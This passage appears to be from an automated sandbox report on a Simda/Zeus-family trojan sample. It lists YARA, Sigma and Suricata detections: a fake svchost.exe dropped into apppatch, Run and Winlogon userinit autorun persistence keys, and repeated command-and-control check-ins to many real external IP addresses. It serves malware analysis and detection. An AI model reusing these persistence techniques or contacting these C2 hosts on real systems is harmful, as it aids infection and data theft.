1.3.svchost.exe.39e0000.16.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
8.2.JbrLYfXaOpqnSngA.exe.1282000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.2.svchost.exe.400000.1.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
1.2.svchost.exe.400000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.12.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.11.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.43.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.30.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.17.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.14.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.2.svchost.exe.2d20000.5.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
5.2.JbrLYfXaOpqnSngA.exe.2890000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.41.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
Click to see the 183 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Bonelessness.exe, ProcessId: 6696, TargetFilename: C:\Windows\apppatch\svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bonelessness.exe", ParentImage: C:\Users\user\Desktop\Bonelessness.exe, ParentProcessId: 6696, ParentProcessName: Bonelessness.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 6720, ProcessName: svchost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\apppatch\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe, ProcessId: 6260, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\userinit

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 6720, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bonelessness.exe", ParentImage: C:\Users\user\Desktop\Bonelessness.exe, ParentProcessId: 6696, ParentProcessName: Bonelessness.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 6720, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bonelessness.exe", ParentImage: C:\Users\user\Desktop\Bonelessness.exe, ParentProcessId: 6696, ParentProcessName: Bonelessness.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 6720, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:47:41.392344+0200
SID:	2803437
Severity:	1
Source Port:	50749
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:47:41.392344+0200
SID:	2804852
Severity:	1
Source Port:	50749
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:47:01.589447+0200
SID:	2803437
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:47:01.589447+0200
SID:	2804852
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:01.518762+0200
SID:	2803437
Severity:	1
Source Port:	60209
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:01.518762+0200
SID:	2804852
Severity:	1
Source Port:	60209
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:41.908933+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	54206
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-23T18:47:52.906016+0200
SID:	2804852
Severity:	1
Source Port:	64285
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 69.162.80.58

Timestamp:	2024-08-23T18:48:59.720188+0200
SID:	2803437
Severity:	1
Source Port:	56393
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 69.162.80.58

Timestamp:	2024-08-23T18:48:59.720188+0200
SID:	2804852
Severity:	1
Source Port:	56393
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:00.817565+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	53971
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:47:52.139890+0200
SID:	2803437
Severity:	1
Source Port:	64276
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:47:52.139890+0200
SID:	2804852
Severity:	1
Source Port:	64276
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-23T18:49:00.092910+0200
SID:	2804852
Severity:	1
Source Port:	56396
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:47:39.077058+0200
SID:	2803437
Severity:	1
Source Port:	51130
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:47:39.077058+0200
SID:	2804852
Severity:	1
Source Port:	51130
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:47:02.071829+0200
SID:	2803437
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:47:02.071829+0200
SID:	2804852
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:47:01.728464+0200
SID:	2803437
Severity:	1
Source Port:	49651
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:47:01.728464+0200
SID:	2804852
Severity:	1
Source Port:	49651
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:48:37.314742+0200
SID:	2803437
Severity:	1
Source Port:	64303
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:48:37.314742+0200
SID:	2804852
Severity:	1
Source Port:	64303
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:47:16.686195+0200
SID:	2803437
Severity:	1
Source Port:	51111
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:47:16.686195+0200
SID:	2804852
Severity:	1
Source Port:	51111
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:41.773244+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	63402
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:42.016225+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	56536
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 52.34.198.229

Timestamp:	2024-08-23T18:48:55.045463+0200
SID:	2803437
Severity:	1
Source Port:	50027
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 52.34.198.229

Timestamp:	2024-08-23T18:48:55.045463+0200
SID:	2804852
Severity:	1
Source Port:	50027
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:47:17.325618+0200
SID:	2804852
Severity:	1
Source Port:	51114
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:54.006576+0200
SID:	2804852
Severity:	1
Source Port:	64286
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:48:56.952582+0200
SID:	2803437
Severity:	1
Source Port:	49517
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:48:56.952582+0200
SID:	2804852
Severity:	1
Source Port:	49517
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:48:24.434472+0200
SID:	2803437
Severity:	1
Source Port:	64290
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:48:24.434472+0200
SID:	2804852
Severity:	1
Source Port:	64290
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:47:52.643227+0200
SID:	2803437
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:47:52.643227+0200
SID:	2804852
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:38.147643+0200
SID:	2803437
Severity:	1
Source Port:	51125
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:38.147643+0200
SID:	2804852
Severity:	1
Source Port:	51125
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:48:52.579521+0200
SID:	2803437
Severity:	1
Source Port:	50118
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:48:52.579521+0200
SID:	2804852
Severity:	1
Source Port:	50118
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:47:02.493738+0200
SID:	2803437
Severity:	1
Source Port:	49657
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:47:02.493738+0200
SID:	2804852
Severity:	1
Source Port:	49657
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:44.031380+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	61998
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz - Source IP: 52.34.198.229 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:47.309576+0200
SID:	2018141
Severity:	1
Source Port:	80
Destination Port:	63803
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 52.34.198.229 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:47.309576+0200
SID:	2037771
Severity:	1
Source Port:	80
Destination Port:	63803
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:47:01.618857+0200
SID:	2803437
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:47:01.618857+0200
SID:	2804852
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:51.282502+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	54974
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:49:00.831770+0200
SID:	2803437
Severity:	1
Source Port:	56389
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:49:00.831770+0200
SID:	2804852
Severity:	1
Source Port:	56389
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:47:01.473287+0200
SID:	2803437
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:47:01.473287+0200
SID:	2804852
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:48:29.319176+0200
SID:	2804852
Severity:	1
Source Port:	64296
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 69.162.80.60

Timestamp:	2024-08-23T18:47:02.186519+0200
SID:	2803437
Severity:	1
Source Port:	49655
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 69.162.80.60

Timestamp:	2024-08-23T18:47:02.186519+0200
SID:	2804852
Severity:	1
Source Port:	49655
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:48:51.934696+0200
SID:	2803437
Severity:	1
Source Port:	50117
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:48:51.934696+0200
SID:	2804852
Severity:	1
Source Port:	50117
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:48:59.438927+0200
SID:	2803437
Severity:	1
Source Port:	56392
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:48:59.438927+0200
SID:	2804852
Severity:	1
Source Port:	56392
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:48:58.452086+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	61952
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:47:52.479234+0200
SID:	2803437
Severity:	1
Source Port:	64283
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:47:52.479234+0200
SID:	2804852
Severity:	1
Source Port:	64283
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz - Source IP: 3.94.10.34 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:01.793758+0200
SID:	2018141
Severity:	1
Source Port:	80
Destination Port:	49652
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 3.94.10.34 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:01.793758+0200
SID:	2037771
Severity:	1
Source Port:	80
Destination Port:	49652
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:48:59.360466+0200
SID:	2803437
Severity:	1
Source Port:	56391
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:48:59.360466+0200
SID:	2804852
Severity:	1
Source Port:	56391
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:47:21.509420+0200
SID:	2804852
Severity:	1
Source Port:	51121
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:49:01.919618+0200
SID:	2803437
Severity:	1
Source Port:	56398
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:49:01.919618+0200
SID:	2804852
Severity:	1
Source Port:	56398
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 103.224.212.210

Timestamp:	2024-08-23T18:48:36.648362+0200
SID:	2803437
Severity:	1
Source Port:	64302
